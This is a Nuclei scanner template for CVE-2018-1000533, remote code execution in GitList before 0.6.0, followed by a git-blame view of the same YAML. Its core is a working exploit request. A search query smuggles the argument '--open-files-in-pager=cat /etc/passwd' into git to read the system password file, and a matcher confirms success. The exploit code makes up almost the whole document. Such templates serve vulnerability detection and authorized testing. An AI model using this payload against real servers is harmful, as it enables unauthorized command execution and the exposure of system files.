nuclei-templates/cves/2018/CVE-2018-1000533.yaml

id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 RCE
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
  reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
  tags: rce,git,cve,cve2018,gitlist
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    extractors:
      - type: regex
        name: path
        group: 1
        internal: true
        part: body
        regex:
          - '<span class="name">(.*?)</span>'

    matchers:
      - type: word
        words:
          - "root:/root:/bin/bash"
        part: body
Create CVE-2018-1000533.yaml 2021-06-15 07:28:10 +00:00			`id: CVE-2018-1000533`

			`info:`
			`name: GitList < 0.6.0 RCE`
			`author: pikpikcu`
			`severity: critical`
Update CVE-2018-1000533.yaml 2021-06-15 10:01:36 +00:00			description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
Create CVE-2018-1000533.yaml 2021-06-15 07:28:10 +00:00			`reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533`
Update CVE-2018-1000533.yaml 2021-06-15 10:01:36 +00:00			`tags: rce,git,cve,cve2018,gitlist`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2018-1000533`
			`cwe-id: CWE-20`
Create CVE-2018-1000533.yaml 2021-06-15 07:28:10 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST /{{path}}/tree/a/search HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`query=--open-files-in-pager=cat%20/etc/passwd`

			`extractors:`
			`- type: regex`
			`name: path`
			`group: 1`
			`internal: true`
			`part: body`
			`regex:`
			`- '<span class="name">(.*?)</span>'`

			`matchers:`
Update CVE-2018-1000533.yaml 2021-06-15 10:53:59 +00:00			`- type: word`
			`words:`
Create CVE-2018-1000533.yaml 2021-06-15 07:28:10 +00:00			`- "root:/root:/bin/bash"`
Update CVE-2018-1000533.yaml 2021-06-15 11:08:28 +00:00			`part: body`